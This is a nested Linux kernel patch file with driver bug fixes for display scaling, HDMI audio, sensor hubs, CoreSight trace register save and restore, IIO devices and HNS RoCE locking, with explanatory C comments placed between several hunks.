+ 	vop2_win_write(win, VOP2_WIN_YRGB_VSCL_FILTER_MODE, vscl_filter_mode);
+ 
+ 	if (info->is_yuv) {
+-		src_w /= info->hsub;
+-		src_h /= info->vsub;
++		cbcr_src_w /= info->hsub;
++		cbcr_src_h /= info->vsub;
+ 
+ 		gt4 = 0;
+ 		gt2 = 0;
+ 
+-		if (src_h >= (4 * dst_h)) {
++		if (cbcr_src_h >= (4 * dst_h)) {
+ 			gt4 = 1;
+-			src_h >>= 2;
+-		} else if (src_h >= (2 * dst_h)) {
++			cbcr_src_h >>= 2;
++		} else if (cbcr_src_h >= (2 * dst_h)) {
+ 			gt2 = 1;
+-			src_h >>= 1;
++			cbcr_src_h >>= 1;
+ 		}
+ 
+-		hor_scl_mode = scl_get_scl_mode(src_w, dst_w);
+-		ver_scl_mode = scl_get_scl_mode(src_h, dst_h);
++		hor_scl_mode = scl_get_scl_mode(cbcr_src_w, dst_w);
++		ver_scl_mode = scl_get_scl_mode(cbcr_src_h, dst_h);
+ 
+-		val = vop2_scale_factor(src_w, dst_w);
++		val = vop2_scale_factor(cbcr_src_w, dst_w);
+ 		vop2_win_write(win, VOP2_WIN_SCALE_CBCR_X, val);
+ 
+-		val = vop2_scale_factor(src_h, dst_h);
++		val = vop2_scale_factor(cbcr_src_h, dst_h);
+ 		vop2_win_write(win, VOP2_WIN_SCALE_CBCR_Y, val);
+ 
+ 		vop2_win_write(win, VOP2_WIN_VSD_CBCR_GT4, gt4);
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index f696818913499..072e2487b4655 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -2489,6 +2489,8 @@ static int vc4_hdmi_audio_init(struct vc4_hdmi *vc4_hdmi)
+ 		index = 1;
+ 
+ 	addr = of_get_address(dev->of_node, index, NULL, NULL);
++	if (!addr)
++		return -EINVAL;
+ 
+ 	vc4_hdmi->audio.dma_data.addr = be32_to_cpup(addr) + mai_data->offset;
+ 	vc4_hdmi->audio.dma_data.addr_width = DMA_SLAVE_BUSWIDTH_4_BYTES;
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index bb8bd7892b674..eda888f75f165 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -222,6 +222,11 @@ static void amd_sfh_resume(struct amd_mp2_dev *mp2)
+ 	struct amd_mp2_sensor_info info;
+ 	int i, status;
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		amd_sfh_clear_intr(mp2);
++		return;
++	}
++
+ 	for (i = 0; i < cl_data->num_hid_devices; i++) {
+ 		if (cl_data->sensor_sts[i] == SENSOR_DISABLED) {
+ 			info.sensor_idx = cl_data->sensor_idx[i];
+@@ -247,6 +252,11 @@ static void amd_sfh_suspend(struct amd_mp2_dev *mp2)
+ 	struct amdtp_cl_data *cl_data = mp2->cl_data;
+ 	int i, status;
+ 
++	if (!cl_data->is_any_sensor_enabled) {
++		amd_sfh_clear_intr(mp2);
++		return;
++	}
++
+ 	for (i = 0; i < cl_data->num_hid_devices; i++) {
+ 		if (cl_data->sensor_idx[i] != HPD_IDX &&
+ 		    cl_data->sensor_sts[i] == SENSOR_ENABLED) {
+diff --git a/drivers/hid/intel-ish-hid/ipc/pci-ish.c b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+index 710fda5f19e1c..916d427163ca2 100644
+--- a/drivers/hid/intel-ish-hid/ipc/pci-ish.c
++++ b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+@@ -216,6 +216,11 @@ static int ish_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	/* request and enable interrupt */
+ 	ret = pci_alloc_irq_vectors(pdev, 1, 1, PCI_IRQ_ALL_TYPES);
++	if (ret < 0) {
++		dev_err(dev, "ISH: Failed to allocate IRQ vectors\n");
++		return ret;
++	}
++
+ 	if (!pdev->msi_enabled && !pdev->msix_enabled)
+ 		irq_flag = IRQF_SHARED;
+ 
+diff --git a/drivers/hwmon/shtc1.c b/drivers/hwmon/shtc1.c
+index 18546ebc8e9f7..0365643029aee 100644
+--- a/drivers/hwmon/shtc1.c
++++ b/drivers/hwmon/shtc1.c
+@@ -238,7 +238,7 @@ static int shtc1_probe(struct i2c_client *client)
+ 
+ 	if (np) {
+ 		data->setup.blocking_io = of_property_read_bool(np, "sensirion,blocking-io");
+-		data->setup.high_precision = !of_property_read_bool(np, "sensicon,low-precision");
++		data->setup.high_precision = !of_property_read_bool(np, "sensirion,low-precision");
+ 	} else {
+ 		if (client->dev.platform_data)
+ 			data->setup = *(struct shtc1_platform_data *)dev->platform_data;
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index fda48a0afc1a5..354267edcb45f 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -1120,6 +1120,8 @@ static void etm4_init_arch_data(void *info)
+ 	drvdata->nr_event = FIELD_GET(TRCIDR0_NUMEVENT_MASK, etmidr0);
+ 	/* QSUPP, bits[16:15] Q element support field */
+ 	drvdata->q_support = FIELD_GET(TRCIDR0_QSUPP_MASK, etmidr0);
++	if (drvdata->q_support)
++		drvdata->q_filt = !!(etmidr0 & TRCIDR0_QFILT);
+ 	/* TSSIZE, bits[28:24] Global timestamp size field */
+ 	drvdata->ts_size = FIELD_GET(TRCIDR0_TSSIZE_MASK, etmidr0);
+ 
+@@ -1615,16 +1617,14 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 	state->trcccctlr = etm4x_read32(csa, TRCCCCTLR);
+ 	state->trcbbctlr = etm4x_read32(csa, TRCBBCTLR);
+ 	state->trctraceidr = etm4x_read32(csa, TRCTRACEIDR);
+-	state->trcqctlr = etm4x_read32(csa, TRCQCTLR);
++	if (drvdata->q_filt)
++		state->trcqctlr = etm4x_read32(csa, TRCQCTLR);
+ 
+ 	state->trcvictlr = etm4x_read32(csa, TRCVICTLR);
+ 	state->trcviiectlr = etm4x_read32(csa, TRCVIIECTLR);
+ 	state->trcvissctlr = etm4x_read32(csa, TRCVISSCTLR);
+ 	if (drvdata->nr_pe_cmp)
+ 		state->trcvipcssctlr = etm4x_read32(csa, TRCVIPCSSCTLR);
+-	state->trcvdctlr = etm4x_read32(csa, TRCVDCTLR);
+-	state->trcvdsacctlr = etm4x_read32(csa, TRCVDSACCTLR);
+-	state->trcvdarcctlr = etm4x_read32(csa, TRCVDARCCTLR);
+ 
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		state->trcseqevr[i] = etm4x_read32(csa, TRCSEQEVRn(i));
+@@ -1641,7 +1641,8 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 		state->trccntvr[i] = etm4x_read32(csa, TRCCNTVRn(i));
+ 	}
+ 
+-	for (i = 0; i < drvdata->nr_resource * 2; i++)
++	/* Resource selector pair 0 is reserved */
++	for (i = 2; i < drvdata->nr_resource * 2; i++)
+ 		state->trcrsctlr[i] = etm4x_read32(csa, TRCRSCTLRn(i));
+ 
+ 	for (i = 0; i < drvdata->nr_ss_cmp; i++) {
+@@ -1726,8 +1727,10 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ {
+ 	int i;
+ 	struct etmv4_save_state *state = drvdata->save_state;
+-	struct csdev_access tmp_csa = CSDEV_ACCESS_IOMEM(drvdata->base);
+-	struct csdev_access *csa = &tmp_csa;
++	struct csdev_access *csa = &drvdata->csdev->access;
++
++	if (WARN_ON(!drvdata->csdev))
++		return;
+ 
+ 	etm4_cs_unlock(drvdata, csa);
+ 	etm4x_relaxed_write32(csa, state->trcclaimset, TRCCLAIMSET);
+@@ -1746,16 +1749,14 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 	etm4x_relaxed_write32(csa, state->trcccctlr, TRCCCCTLR);
+ 	etm4x_relaxed_write32(csa, state->trcbbctlr, TRCBBCTLR);
+ 	etm4x_relaxed_write32(csa, state->trctraceidr, TRCTRACEIDR);
+-	etm4x_relaxed_write32(csa, state->trcqctlr, TRCQCTLR);
++	if (drvdata->q_filt)
++		etm4x_relaxed_write32(csa, state->trcqctlr, TRCQCTLR);
+ 
+ 	etm4x_relaxed_write32(csa, state->trcvictlr, TRCVICTLR);
+ 	etm4x_relaxed_write32(csa, state->trcviiectlr, TRCVIIECTLR);
+ 	etm4x_relaxed_write32(csa, state->trcvissctlr, TRCVISSCTLR);
+ 	if (drvdata->nr_pe_cmp)
+ 		etm4x_relaxed_write32(csa, state->trcvipcssctlr, TRCVIPCSSCTLR);
+-	etm4x_relaxed_write32(csa, state->trcvdctlr, TRCVDCTLR);
+-	etm4x_relaxed_write32(csa, state->trcvdsacctlr, TRCVDSACCTLR);
+-	etm4x_relaxed_write32(csa, state->trcvdarcctlr, TRCVDARCCTLR);
+ 
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, state->trcseqevr[i], TRCSEQEVRn(i));
+@@ -1772,7 +1773,8 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 		etm4x_relaxed_write32(csa, state->trccntvr[i], TRCCNTVRn(i));
+ 	}
+ 
+-	for (i = 0; i < drvdata->nr_resource * 2; i++)
++	/* Resource selector pair 0 is reserved */
++	for (i = 2; i < drvdata->nr_resource * 2; i++)
+ 		etm4x_relaxed_write32(csa, state->trcrsctlr[i], TRCRSCTLRn(i));
+ 
+ 	for (i = 0; i < drvdata->nr_ss_cmp; i++) {
+@@ -2053,6 +2055,9 @@ static int etm4_probe_platform_dev(struct platform_device *pdev)
+ 	ret = etm4_probe(&pdev->dev, NULL, 0);
+ 
+ 	pm_runtime_put(&pdev->dev);
++	if (ret)
++		pm_runtime_disable(&pdev->dev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index d8e4d902b01ad..31754173091b9 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -43,9 +43,6 @@
+ #define TRCVIIECTLR			0x084
+ #define TRCVISSCTLR			0x088
+ #define TRCVIPCSSCTLR			0x08C
+-#define TRCVDCTLR			0x0A0
+-#define TRCVDSACCTLR			0x0A4
+-#define TRCVDARCCTLR			0x0A8
+ /* Derived resources registers */
+ #define TRCSEQEVRn(n)			(0x100 + (n * 4)) /* n = 0-2 */
+ #define TRCSEQRSTEVR			0x118
+@@ -90,9 +87,6 @@
+ /* Address Comparator registers n = 0-15 */
+ #define TRCACVRn(n)			(0x400 + (n * 8))
+ #define TRCACATRn(n)			(0x480 + (n * 8))
+-/* Data Value Comparator Value registers, n = 0-7 */
+-#define TRCDVCVRn(n)			(0x500 + (n * 16))
+-#define TRCDVCMRn(n)			(0x580 + (n * 16))
+ /* ContextID/Virtual ContextID comparators, n = 0-7 */
+ #define TRCCIDCVRn(n)			(0x600 + (n * 8))
+ #define TRCVMIDCVRn(n)			(0x640 + (n * 8))
+@@ -141,6 +135,7 @@
+ #define TRCIDR0_TRCCCI				BIT(7)
+ #define TRCIDR0_RETSTACK			BIT(9)
+ #define TRCIDR0_NUMEVENT_MASK			GENMASK(11, 10)
++#define TRCIDR0_QFILT				BIT(14)
+ #define TRCIDR0_QSUPP_MASK			GENMASK(16, 15)
+ #define TRCIDR0_TSSIZE_MASK			GENMASK(28, 24)
+ 
+@@ -272,9 +267,6 @@
+ /* List of registers accessible via System instructions */
+ #define ETM4x_ONLY_SYSREG_LIST(op, val)		\
+ 	CASE_##op((val), TRCPROCSELR)		\
+-	CASE_##op((val), TRCVDCTLR)		\
+-	CASE_##op((val), TRCVDSACCTLR)		\
+-	CASE_##op((val), TRCVDARCCTLR)		\
+ 	CASE_##op((val), TRCOSLAR)
+ 
+ #define ETM_COMMON_SYSREG_LIST(op, val)		\
+@@ -422,22 +414,6 @@
+ 	CASE_##op((val), TRCACATRn(13))		\
+ 	CASE_##op((val), TRCACATRn(14))		\
+ 	CASE_##op((val), TRCACATRn(15))		\
+-	CASE_##op((val), TRCDVCVRn(0))		\
+-	CASE_##op((val), TRCDVCVRn(1))		\
+-	CASE_##op((val), TRCDVCVRn(2))		\
+-	CASE_##op((val), TRCDVCVRn(3))		\
+-	CASE_##op((val), TRCDVCVRn(4))		\
+-	CASE_##op((val), TRCDVCVRn(5))		\
+-	CASE_##op((val), TRCDVCVRn(6))		\
+-	CASE_##op((val), TRCDVCVRn(7))		\
+-	CASE_##op((val), TRCDVCMRn(0))		\
+-	CASE_##op((val), TRCDVCMRn(1))		\
+-	CASE_##op((val), TRCDVCMRn(2))		\
+-	CASE_##op((val), TRCDVCMRn(3))		\
+-	CASE_##op((val), TRCDVCMRn(4))		\
+-	CASE_##op((val), TRCDVCMRn(5))		\
+-	CASE_##op((val), TRCDVCMRn(6))		\
+-	CASE_##op((val), TRCDVCMRn(7))		\
+ 	CASE_##op((val), TRCCIDCVRn(0))		\
+ 	CASE_##op((val), TRCCIDCVRn(1))		\
+ 	CASE_##op((val), TRCCIDCVRn(2))		\
+@@ -905,9 +881,6 @@ struct etmv4_save_state {
+ 	u32	trcviiectlr;
+ 	u32	trcvissctlr;
+ 	u32	trcvipcssctlr;
+-	u32	trcvdctlr;
+-	u32	trcvdsacctlr;
+-	u32	trcvdarcctlr;
+ 
+ 	u32	trcseqevr[ETM_MAX_SEQ_STATES];
+ 	u32	trcseqrstevr;
+@@ -979,6 +952,7 @@ struct etmv4_save_state {
+  * @os_unlock:  True if access to management registers is allowed.
+  * @instrp0:	Tracing of load and store instructions
+  *		as P0 elements is supported.
++ * @q_filt:	Q element filtering support, if Q elements are supported.
+  * @trcbb:	Indicates if the trace unit supports branch broadcast tracing.
+  * @trccond:	If the trace unit supports conditional
+  *		instruction tracing.
+@@ -1041,6 +1015,7 @@ struct etmv4_drvdata {
+ 	bool				boot_enable;
+ 	bool				os_unlock;
+ 	bool				instrp0;
++	bool				q_filt;
+ 	bool				trcbb;
+ 	bool				trccond;
+ 	bool				retstack;
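/*
 * Summary of the two coresight hunks above: TRCQCTLR exists only when
 * TRCIDR0.QFILT says Q-element filtering is implemented, resource
 * selector pair 0 is reserved and must not be saved or restored, and
 * the TRCVDxxx and TRCDVCxxx data-trace registers are gone because
 * ETMv4 on A-profile cores does not implement data tracing; touching
 * unimplemented registers can fault on real hardware.
 */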
+diff --git a/drivers/hwtracing/stm/core.c b/drivers/hwtracing/stm/core.c
+index 2712e699ba08c..ae9ea3a1fa2aa 100644
+--- a/drivers/hwtracing/stm/core.c
++++ b/drivers/hwtracing/stm/core.c
+@@ -868,8 +868,11 @@ int stm_register_device(struct device *parent, struct stm_data *stm_data,
+ 		return -ENOMEM;
+ 
+ 	stm->major = register_chrdev(0, stm_data->name, &stm_fops);
+-	if (stm->major < 0)
+-		goto err_free;
++	if (stm->major < 0) {
++		err = stm->major;
++		vfree(stm);
++		return err;
++	}
+ 
+ 	device_initialize(&stm->dev);
+ 	stm->dev.devt = MKDEV(stm->major, 0);
+@@ -913,10 +916,8 @@ int stm_register_device(struct device *parent, struct stm_data *stm_data,
+ err_device:
+ 	unregister_chrdev(stm->major, stm_data->name);
+ 
+-	/* matches device_initialize() above */
++	/* calls stm_device_release() */
+ 	put_device(&stm->dev);
+-err_free:
+-	vfree(stm);
+ 
+ 	return err;
+ }
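/*
 * The rule the stm fix above follows, as a sketch (example_* names are
 * hypothetical): before device_initialize() the object is a plain
 * allocation and is freed directly; afterwards its lifetime belongs to
 * the refcount, and only put_device() -- which ends in the release
 * callback -- may free it. Mixing the two leaks or double-frees.
 */
#include <linux/device.h>
#include <linux/vmalloc.h>

struct example_obj {
	struct device dev;
};

static int example_register(struct example_obj *obj,
			    int (*early)(void), int (*late)(void))
{
	int err = early();

	if (err) {
		vfree(obj);		/* not yet a refcounted device */
		return err;
	}

	device_initialize(&obj->dev);

	err = late();
	if (err) {
		put_device(&obj->dev);	/* release callback frees obj */
		return err;
	}
	return 0;
}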
+diff --git a/drivers/iio/adc/stm32-adc.c b/drivers/iio/adc/stm32-adc.c
+index a5d5b7b3823bc..6fede34091cc2 100644
+--- a/drivers/iio/adc/stm32-adc.c
++++ b/drivers/iio/adc/stm32-adc.c
+@@ -2079,6 +2079,7 @@ static int stm32_adc_generic_chan_init(struct iio_dev *indio_dev,
+ 			if (vin[0] != val || vin[1] >= adc_info->max_channels) {
+ 				dev_err(&indio_dev->dev, "Invalid channel in%d-in%d\n",
+ 					vin[0], vin[1]);
++				ret = -EINVAL;
+ 				goto err;
+ 			}
+ 		} else if (ret != -EINVAL) {
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index a2f8278f00856..135a86fc94531 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -1670,8 +1670,10 @@ struct iio_dev *iio_device_alloc(struct device *parent, int sizeof_priv)
+ 		return NULL;
+ 
+ 	indio_dev = &iio_dev_opaque->indio_dev;
+-	indio_dev->priv = (char *)iio_dev_opaque +
+-		ALIGN(sizeof(struct iio_dev_opaque), IIO_DMA_MINALIGN);
++
++	if (sizeof_priv)
++		indio_dev->priv = (char *)iio_dev_opaque +
++			ALIGN(sizeof(*iio_dev_opaque), IIO_DMA_MINALIGN);
+ 
+ 	indio_dev->dev.parent = parent;
+ 	indio_dev->dev.type = &iio_device_type;
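/*
 * Context for the sizeof_priv check: when a driver asks for no private
 * area there is nothing for priv to point at, and the old
 * unconditional assignment produced a pointer past the end of the
 * allocation; it now stays NULL. The normal driver pattern, for
 * contrast (struct example_state is hypothetical):
 */
#include <linux/iio/iio.h>

struct example_state {
	int foo;
};

static int example_alloc(struct device *dev)
{
	struct iio_dev *indio_dev;
	struct example_state *st;

	indio_dev = devm_iio_device_alloc(dev, sizeof(*st));
	if (!indio_dev)
		return -ENOMEM;

	st = iio_priv(indio_dev);	/* valid: sizeof_priv > 0 above */
	st->foo = 0;
	return 0;
}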
+diff --git a/drivers/iio/pressure/dps310.c b/drivers/iio/pressure/dps310.c
+index db1b1e48225aa..519fcd425b6a3 100644
+--- a/drivers/iio/pressure/dps310.c
++++ b/drivers/iio/pressure/dps310.c
+@@ -730,7 +730,7 @@ static int dps310_read_pressure(struct dps310_data *data, int *val, int *val2,
+ 	}
+ }
+ 
+-static int dps310_calculate_temp(struct dps310_data *data)
++static int dps310_calculate_temp(struct dps310_data *data, int *val)
+ {
+ 	s64 c0;
+ 	s64 t;
+@@ -746,7 +746,9 @@ static int dps310_calculate_temp(struct dps310_data *data)
+ 	t = c0 + ((s64)data->temp_raw * (s64)data->c1);
+ 
+ 	/* Convert to milliCelsius and scale the temperature */
+-	return (int)div_s64(t * 1000LL, kt);
++	*val = (int)div_s64(t * 1000LL, kt);
++
++	return 0;
+ }
+ 
+ static int dps310_read_temp(struct dps310_data *data, int *val, int *val2,
+@@ -768,11 +770,10 @@ static int dps310_read_temp(struct dps310_data *data, int *val, int *val2,
+ 		if (rc)
+ 			return rc;
+ 
+-		rc = dps310_calculate_temp(data);
+-		if (rc < 0)
++		rc = dps310_calculate_temp(data, val);
++		if (rc)
+ 			return rc;
+ 
+-		*val = rc;
+ 		return IIO_VAL_INT;
+ 
+ 	case IIO_CHAN_INFO_OVERSAMPLING_RATIO:
+diff --git a/drivers/infiniband/hw/hns/hns_roce_cq.c b/drivers/infiniband/hw/hns/hns_roce_cq.c
+index 736dc2f993b40..ff177466de9b4 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_cq.c
++++ b/drivers/infiniband/hw/hns/hns_roce_cq.c
+@@ -151,7 +151,7 @@ static int alloc_cqc(struct hns_roce_dev *hr_dev, struct hns_roce_cq *hr_cq)
+ 		return ret;
+ 	}
+ 
+-	ret = xa_err(xa_store(&cq_table->array, hr_cq->cqn, hr_cq, GFP_KERNEL));
++	ret = xa_err(xa_store_irq(&cq_table->array, hr_cq->cqn, hr_cq, GFP_KERNEL));
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to xa_store CQ, ret = %d.\n", ret);
+ 		goto err_put;
+@@ -164,7 +164,7 @@ static int alloc_cqc(struct hns_roce_dev *hr_dev, struct hns_roce_cq *hr_cq)
+ 	return 0;
+ 
+ err_xa:
+-	xa_erase(&cq_table->array, hr_cq->cqn);
++	xa_erase_irq(&cq_table->array, hr_cq->cqn);
+ err_put:
+ 	hns_roce_table_put(hr_dev, &cq_table->table, hr_cq->cqn);
+ 
+@@ -183,7 +183,7 @@ static void free_cqc(struct hns_roce_dev *hr_dev, struct hns_roce_cq *hr_cq)
+ 		dev_err(dev, "DESTROY_CQ failed (%d) for CQN %06lx\n", ret,
+ 			hr_cq->cqn);
+ 
+-	xa_erase(&cq_table->array, hr_cq->cqn);
++	xa_erase_irq(&cq_table->array, hr_cq->cqn);
+ 
+ 	/* Waiting interrupt process procedure carried out */
+ 	synchronize_irq(hr_dev->eq_table.eq[hr_cq->vector].irq);
+@@ -472,13 +472,6 @@ void hns_roce_cq_event(struct hns_roce_dev *hr_dev, u32 cqn, int event_type)
+ 	struct ib_event event;
+ 	struct ib_cq *ibcq;
+ 
+-	hr_cq = xa_load(&hr_dev->cq_table.array,
+-			cqn & (hr_dev->caps.num_cqs - 1));
+-	if (!hr_cq) {
+-		dev_warn(dev, "async event for bogus CQ 0x%06x\n", cqn);
+-		return;
+-	}
+-
+ 	if (event_type != HNS_ROCE_EVENT_TYPE_CQ_ID_INVALID &&
+ 	    event_type != HNS_ROCE_EVENT_TYPE_CQ_ACCESS_ERROR &&
+ 	    event_type != HNS_ROCE_EVENT_TYPE_CQ_OVERFLOW) {
+@@ -487,7 +480,16 @@ void hns_roce_cq_event(struct hns_roce_dev *hr_dev, u32 cqn, int event_type)
+ 		return;
+ 	}
+ 
+-	refcount_inc(&hr_cq->refcount);
++	xa_lock(&hr_dev->cq_table.array);
++	hr_cq = xa_load(&hr_dev->cq_table.array,
++			cqn & (hr_dev->caps.num_cqs - 1));
++	if (hr_cq)
++		refcount_inc(&hr_cq->refcount);
++	xa_unlock(&hr_dev->cq_table.array);
++	if (!hr_cq) {
++		dev_warn(dev, "async event for bogus CQ 0x%06x\n", cqn);
++		return;
++	}
+ 
+ 	ibcq = &hr_cq->ib_cq;
+ 	if (ibcq->event_handler) {
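/*
 * Two things happen in the hns_roce_cq.c hunks above: the xarray now
 * uses the _irq locking variants because hns_roce_cq_event() runs in
 * interrupt context and walks the same array, and the lookup takes the
 * refcount under xa_lock so a CQ freed by a racing destroy can no
 * longer be dereferenced after the NULL check.
 */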
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hem.h b/drivers/infiniband/hw/hns/hns_roce_hem.h
+index 7d23d3c51da46..fea6d7d508b60 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hem.h
++++ b/drivers/infiniband/hw/hns/hns_roce_hem.h
+@@ -61,16 +61,16 @@ enum {
+ 	 (sizeof(struct scatterlist) + sizeof(void *)))
+ 
+ #define check_whether_bt_num_3(type, hop_num) \
+-	(type < HEM_TYPE_MTT && hop_num == 2)
++	((type) < HEM_TYPE_MTT && (hop_num) == 2)
+ 
+ #define check_whether_bt_num_2(type, hop_num) \
+-	((type < HEM_TYPE_MTT && hop_num == 1) || \
+-	(type >= HEM_TYPE_MTT && hop_num == 2))
++	(((type) < HEM_TYPE_MTT && (hop_num) == 1) || \
++	((type) >= HEM_TYPE_MTT && (hop_num) == 2))
+ 
+ #define check_whether_bt_num_1(type, hop_num) \
+-	((type < HEM_TYPE_MTT && hop_num == HNS_ROCE_HOP_NUM_0) || \
+-	(type >= HEM_TYPE_MTT && hop_num == 1) || \
+-	(type >= HEM_TYPE_MTT && hop_num == HNS_ROCE_HOP_NUM_0))
++	(((type) < HEM_TYPE_MTT && (hop_num) == HNS_ROCE_HOP_NUM_0) || \
++	((type) >= HEM_TYPE_MTT && (hop_num) == 1) || \
++	((type) >= HEM_TYPE_MTT && (hop_num) == HNS_ROCE_HOP_NUM_0))
+ 
+ struct hns_roce_hem_chunk {
+ 	struct list_head	 list;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index d06b19e69a151..c931cce50d50d 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -2229,7 +2229,7 @@ static void apply_func_caps(struct hns_roce_dev *hr_dev)
+ 		caps->gid_table_len[0] = caps->gmv_bt_num *
+ 					(HNS_HW_PAGE_SIZE / caps->gmv_entry_sz);
+ 
+-		caps->gmv_entry_num = caps->gmv_bt_num * (PAGE_SIZE /
++		caps->gmv_entry_num = caps->gmv_bt_num * (HNS_HW_PAGE_SIZE /
+ 							  caps->gmv_entry_sz);
+ 	} else {
+ 		u32 func_num = max_t(u32, 1, hr_dev->func_num);
+@@ -3857,8 +3857,9 @@ static void get_cqe_status(struct hns_roce_dev *hr_dev, struct hns_roce_qp *qp,
+ 		   wc->status == IB_WC_WR_FLUSH_ERR))
+ 		return;
+ 
+-	ibdev_err(&hr_dev->ib_dev, "error cqe status 0x%x:\n", cqe_status);
+-	print_hex_dump(KERN_ERR, "", DUMP_PREFIX_NONE, 16, 4, cqe,
++	ibdev_err_ratelimited(&hr_dev->ib_dev, "error cqe status 0x%x:\n",
++			      cqe_status);
++	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_NONE, 16, 4, cqe,
+ 		       cq->cqe_size, false);
+ 	wc->vendor_err = hr_reg_read(cqe, CQE_SUB_STATUS);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index da1b33d818d82..afe7523eca909 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -37,6 +37,7 @@
+ #include <rdma/ib_smi.h>
+ #include <rdma/ib_user_verbs.h>
+ #include <rdma/ib_cache.h>
++#include "hnae3.h"
+ #include "hns_roce_common.h"
+ #include "hns_roce_device.h"
+ #include "hns_roce_hem.h"
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 14376490ac226..190e62da98e4b 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -421,18 +421,18 @@ int hns_roce_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg, int sg_nents,
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
+ 	struct hns_roce_mr *mr = to_hr_mr(ibmr);
+ 	struct hns_roce_mtr *mtr = &mr->pbl_mtr;
+-	int ret = 0;
++	int ret, sg_num = 0;
+ 
+ 	mr->npages = 0;
+ 	mr->page_list = kvcalloc(mr->pbl_mtr.hem_cfg.buf_pg_count,
+ 				 sizeof(dma_addr_t), GFP_KERNEL);
+ 	if (!mr->page_list)
+-		return ret;
++		return sg_num;
+ 
+-	ret = ib_sg_to_pages(ibmr, sg, sg_nents, sg_offset, hns_roce_set_page);
+-	if (ret < 1) {
++	sg_num = ib_sg_to_pages(ibmr, sg, sg_nents, sg_offset, hns_roce_set_page);
++	if (sg_num < 1) {
+ 		ibdev_err(ibdev, "failed to store sg pages %u %u, cnt = %d.\n",
+-			  mr->npages, mr->pbl_mtr.hem_cfg.buf_pg_count, ret);
++			  mr->npages, mr->pbl_mtr.hem_cfg.buf_pg_count, sg_num);
+ 		goto err_page_list;
+ 	}
+ 
+@@ -443,17 +443,16 @@ int hns_roce_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg, int sg_nents,
+ 	ret = hns_roce_mtr_map(hr_dev, mtr, mr->page_list, mr->npages);
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to map sg mtr, ret = %d.\n", ret);
+-		ret = 0;
++		sg_num = 0;
+ 	} else {
+ 		mr->pbl_mtr.hem_cfg.buf_pg_shift = (u32)ilog2(ibmr->page_size);
+-		ret = mr->npages;
+ 	}
+ 
+ err_page_list:
+ 	kvfree(mr->page_list);
+ 	mr->page_list = NULL;
+ 
+-	return ret;
++	return sg_num;
+ }
+ 
+ static void hns_roce_mw_free(struct hns_roce_dev *hr_dev,
+diff --git a/drivers/infiniband/hw/hns/hns_roce_srq.c b/drivers/infiniband/hw/hns/hns_roce_srq.c
+index 8dae98f827eb2..6a4923c21cbc6 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_srq.c
++++ b/drivers/infiniband/hw/hns/hns_roce_srq.c
+@@ -122,7 +122,7 @@ static int alloc_srqc(struct hns_roce_dev *hr_dev, struct hns_roce_srq *srq)
+ 		return ret;
+ 	}
+ 
+-	ret = xa_err(xa_store(&srq_table->xa, srq->srqn, srq, GFP_KERNEL));
++	ret = xa_err(xa_store_irq(&srq_table->xa, srq->srqn, srq, GFP_KERNEL));
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to store SRQC, ret = %d.\n", ret);
+ 		goto err_put;
+@@ -135,7 +135,7 @@ static int alloc_srqc(struct hns_roce_dev *hr_dev, struct hns_roce_srq *srq)
+ 	return 0;
+ 
+ err_xa:
+-	xa_erase(&srq_table->xa, srq->srqn);
